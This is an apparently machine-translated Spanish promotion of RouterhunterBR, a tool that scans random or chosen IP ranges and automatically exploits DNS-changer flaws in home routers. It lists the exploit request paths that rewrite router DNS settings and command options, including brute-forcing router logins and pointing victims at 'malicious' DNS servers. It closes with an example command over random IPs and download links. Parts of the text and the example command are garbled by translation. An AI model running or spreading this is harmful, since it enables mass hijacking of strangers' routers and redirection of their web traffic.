El RouterhunterBR es una herramienta de seguridad automatizada. Que encuentra vulnerabilidades y realiza pruebas en los routers y dispositivos vulnerables en Internet. El RouterhunterBR fue diseñado para funcionar a través de Internet en busca de pistas ips definidos o al azar con el fin de explotar la vulnerabilidad de forma automática DNSChanger en routers domésticos.
El DNSChanger es un troyano capaz de dirigir las peticiones del usuario a ilegales sitios. En la práctica , este programa malicioso capacidad de cambiar la configuración de DNS de nuestra máquina de redirigir al usuario a sitios con fines maliciosos . Imagínese , por ejemplo, que su sistema está infectado con este malware , lo que podría ocurrir es que el usuario para acceder a un determinado sitio (por ejemplo . Facebook.com ) puede ser remitido a una oferta no solicitada sitio web y potencialmente ilegal.
AUTOR: Jhonathan Davi A.K.A jh00nbr
EMAIL*: jhoonbr@protonmail.ch
Blog: http://blog.inurl.com.br
Twitter: https://twitter.com/jh00nbr
Facebook: https://fb.com/JhonVipNet
Fanpage: https://fb.com/InurlBrasil
Github: https://github.com/jh00nbr/
Youtube: http://www.youtube.com/c/Mrsinisterboy
Obtiene:
Código:
/ Dnscfg.cgi ? DnsPrimary = 8.8.8.8 y dnsSecondary = 8.8.4.4 y dnsDynamic = 0 & dnsRefresh = 1 "
/ Dnscfg.cgi ? DnsSecondary = 8.8.8.8 y dnsIfcsList = & dnsRefresh = 1 "
/ Dnscfg.cgi ? DnsPrimary = 8.8.8.8 y dnsSecondary = 8.8.4.4 y dnsDynamic = 0 & dnsRefresh = 1 & dnsIfcsList = "
/ Dnscfg.cgi ? DnsSecondary = 8.8.4.4 y dnsDynamic = 0 & dnsRefresh = 1 "
/ dns_1? Enable_DNSFollowing = 1 & dnsPrimary = 8.8.8.8 y dnsSecondary = 8.8.4.4
/ ddnsmngr.cmd?action=apply&service=0&enbl=0 & dnsPrimary= 8.8.8.8 & dnsSecondary= 8.8.4.4 &dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP”
INSTALACIÓN:
-range 201.12.50.0-255
volveremos a poner un IP gama que va a ser escaneado
-bruteforce
Fuerza bruta con usuarios y contraseñas en los routers que requiere autenticación, obligando a la alteración de DNS.
-startip / -endip
Puede personalizar el IP de gama con un comodín / Ejemplo: -startip 201. * . * . * -endip 201. * . * . *
-dns1 8.8.8.8 / -dns2 8.8.4.4 Servidor primario y secundario DNS malicioso , que la ira está escuchando las peticiones y se realice la redirección de páginas
-threads 10
Numeración Los hilos
-randomip
Asignaron al azar a los routers ips
-limitip 10
Definir IP al azar limite
La explotación de la demostración de:
ips al azar:
pitón routerhunter.py -dns1 8.8.8.8 -dns2 8.8.4.4 -randomip -limitip 10 10 -threads
Link de Descarga.
GitHub:
https://github.com/jh00nbr/
Mas Información: https://jh00nsec.wordpress.com/2016/01/22/routerhunterbr-2-0-testing-vulnerabilities-in-devices-and-routers-connected-to-the-internet-dnschanger/